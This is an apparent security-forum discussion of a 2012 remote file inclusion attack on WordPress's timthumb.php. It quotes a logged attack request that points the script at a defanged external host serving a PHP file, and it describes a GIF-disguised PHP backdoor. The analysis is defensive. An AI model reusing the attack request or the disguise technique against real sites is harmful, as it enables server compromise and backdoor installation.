See: https://www.virustotal.com/url/801e01b1e0757edcb07201e4fd4b35fe927a23c7b75a320a22b8da015ec19cd0/analysis/1328823773/
and
http://vscan.urlvoid.com/analysis/f42e63123f17e6692ff5bb67ed793aad/amFtaWxhLXBocA==/
RFI malware listed at critical security as -196.36.89.12,09/Feb/2012:03:20:03 +0100,hxxp://picasa.com.dk-cell.com.mx/jamila.php,/misc//wp-content/plugins/wp-pagenavi/inc/timthumb.php?src=hxxp://picasa.com.dk-cell.com.mx/jamila.php HTTP/1.1
See: -http://jsunpack.jeek.org/?report=6bd6e499bead9eab1736f5529a27c2fb0ddca085 (Go to last mentioned link only if security savvy, with ample script protection and in a VM),
Random vulnerability. For a description see: http://www.metod.si/random-vulnerability-disected/ link from SimpleFolia, article author razno - it has obfuscated PHP code behind the binairy data in a file that initially tries to disguise as a GIF image – GIF89a,

polonus

VirusTotal
https://www.virustotal.com/file/2bcc7261416bcef8da36472e889404cc2d11e8063dbbd70e85585e11c075bfa4/analysis/1328824642/

And with this malware, there is use of “End Of Transmission” as well as many other abnormal hex values for a website. See the complete list attached.

Hi Donovansrb10,

The EOT there is marking the end of the gif data source file, separating it from the PHP backdoor code part.
That is why I run webbug detector extension in GoogleChrome to be aware to webbugs on a page, but normally webbugs are not infected via rfi,
Inside the code we find → $lol is $_GET[‘lol’]; ← (is equals = pol), lots of this particular RFI can be found via RFI logs,

polonus